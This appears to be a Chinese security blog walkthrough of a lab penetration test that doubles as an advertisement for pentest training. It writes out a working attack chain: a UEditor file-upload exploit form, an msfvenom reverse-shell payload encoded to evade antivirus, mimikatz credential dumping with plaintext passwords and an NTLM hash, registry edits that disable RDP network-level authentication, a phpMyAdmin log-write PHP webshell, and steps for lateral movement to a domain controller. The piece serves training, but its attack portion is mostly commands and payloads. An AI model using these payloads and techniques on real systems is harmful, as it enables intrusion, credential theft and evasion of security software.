
九月出师人数共七人
共七篇文章 目前第二篇

1.站库分离 外网打点
2.过360全家桶
3.过windwos defender
4.过火绒
5.内网漫游
6.多层网络渗透
7.横向渗透
8.jwt token密钥破解
9.权限提升
10.域渗透
11.phpmyadmin写shell
12.sqlserver 提权
每三个月一次考核,每个项目根据当前流行的技术进行适当的调整。
项目综合考核渗透测试能力,培养单兵作战的安全选手。
需要渗透测试培训 欢迎添加好友咨询
前台登陆看到/member
猜是cms去下源码
这边访问/admin进入后台登陆页面
注册hello 123456
权限很低只能看一些信息 无法创建模板
抓包发现cookies参数没有加密在注册 admin账户时发现
admincook=admin可能是鉴权参数
改cookies垂直越权管理员
发现ueditor
ueditor1.43 文件上传poc
<form action="http://www.ackmoon.com/Admin/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"method="POST"> <p>shelladdr: <inputtype="text"name="source[]"/></p><inputtype="submit"value="Submit"/></form>
官网下载源码得知文件controller.ashx路径
/admin/net/controller.ashx
制作马上传vps
edge
冰蝎连
tasklist发现360全家桶
上马连cs
权限是iis需要提权
netstate-ano 发现数据库服务器192.168.22.133:1433
想法是上线到msf上看看哪些能提权
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.122 LPORT=2333 -ex86/shikata_ga_nai -i 15 -f csharp -o payload.txt
同样的shellcode换成msf的一直免杀不了
换个思路
官网下载源码找到数据库配置文件位置 找到配置文件
serid=sa;[email protected];initial catalog=DemoHdhCms;datasource=192.168.22.133
发现内网web2
哥斯拉内存加载提权上线
privilege::debug
sekurlsa::logonpasswords
administrator
QWEasd.123
192.168.22.151:5985
192.168.22.151:3389
192.168.22.151:999
192.168.22.151:139
192.168.22.151:135
192.168.22.151:80
192.168.22.135:5985
192.168.22.151:21(220 Microsoft FTP Service)
192.168.22.135:139
192.168.22.135:135
192.168.22.135:80
192.168.22.133:5985
192.168.22.133:139
192.168.22.133:135
192.168.22.133:80
192.168.22.1:5040
192.168.22.1:912
192.168.22.1:902
192.168.22.1:139
192.168.22.1:135
192.168.22.133:445
192.168.22.135:445
192.168.22.151:445(platform: 500 version: 6.3 name: 12SERVER-WEB1 domain: WORKGROUP)
登陆3389
报错密码过期
查了一下密码过期并不是真的过期 可能是 开启了开启仅允许运行使用网络级别身份验证的远程桌面的计算机连接
找到注册表位置
下方为关闭仅允许运行使用网络级别身份验证的远程桌面的计算机连接
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-TCP" /v UserAuthentication /t REG_DWORD/d "0" /f
下方为开启仅允许运行使用网络级别身份验证的远程桌面的计算机连接
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-TCP" /v UserAuthentication /t REG_DWORD/d "1" /f
登陆关闭360
换一种方式连接数据库这里用 webshell代理proxychains进内网通过impack工具包连接mssql
开启xpcmdshell成功但执行命令 报错5
开启xpcmdshell执行命令报错5
访问
192.168.22.135web
jwt
jwtcrack跑不出加密秘钥
C:/Hws.com/HwsHostMaster/wwwroot/www.ackmoon.com/web/upfiles/image/20210902/active_desktop_launcher.exe
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC8xMC4xMC4xLjEzNSIsImF1ZCI6Imh0dHA6XC9cLzEwLjEwLjEuMTM1IiwiaWF0IjoxNjMwODQ0MjY0LCJuYmYiOjE2MzA4NDQyNzQsImV4cCI6MTYzMDg0NDg2NCwiZGF0YSI6eyJ1c2VyaWQiOjEsInVzZXJuYW1lIjoiZGVtbyJ9fQ.3cVS7_s0ncvlhm4N_0PVkc7ysw0a43Z2Rk9yDmmisD0
换了个工具继续跑 jwt-tools-master
登陆之后没有功能点可供shell
Qweasdzxc5
目录扫描发现报错页面得知为phpstudy_pro
phpstudypro
有个phpmyadmin4.8.5
root和jwt跑出的key登陆
尝试日志写一句话
select "eval($_POST['wh04m1']); "
蚁剑代理连接system权限
ackmoon:1008:aad3b435b51404eeaad3b435b51404ee:b9cf8253d9c3f9aa49430a541be29c1c
蚁剑上传有问题换冰蝎上传正向上线
定位域控查找域管 导出域管hash密码为QWEasd.999
QWEasd.999
尝试了一大堆拿域控的方法未果
无奈上传ladon爆smb
三板斧
失败正向连不上 可能有墙
psexec上线吧还是
迁移域管导域内hash
还是三板斧
本公众号长期更新安全类技术文章 欢迎关注和转发
介绍 由国家网信办和浙江省政府共同举办的2021年世界互联网大会乌镇峰会,将于9月26日至28日在浙江乌镇召开。本届博览会以“迈向数字文明新时代——携手构建网络空间命运共同体”为主题。 &nb…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论